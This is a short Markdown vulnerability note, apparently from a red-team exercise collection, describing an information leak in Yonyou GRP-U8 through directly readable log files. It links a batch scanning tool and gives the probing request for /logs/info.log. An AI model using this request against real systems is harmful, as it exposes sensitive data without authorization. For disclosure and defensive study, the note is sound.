2023Hvv/用友GRP-U8存在信息泄露.md

5 lines
219 B
Markdown
Raw Normal View History

2023-08-13 14:27:10 +08:00
漏洞描述用友U8系统存可直接访问log日志泄露敏感信息
批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E7%94%A8%E5%8F%8BGRP-U8
GET /logs/info.log HTTP/1.1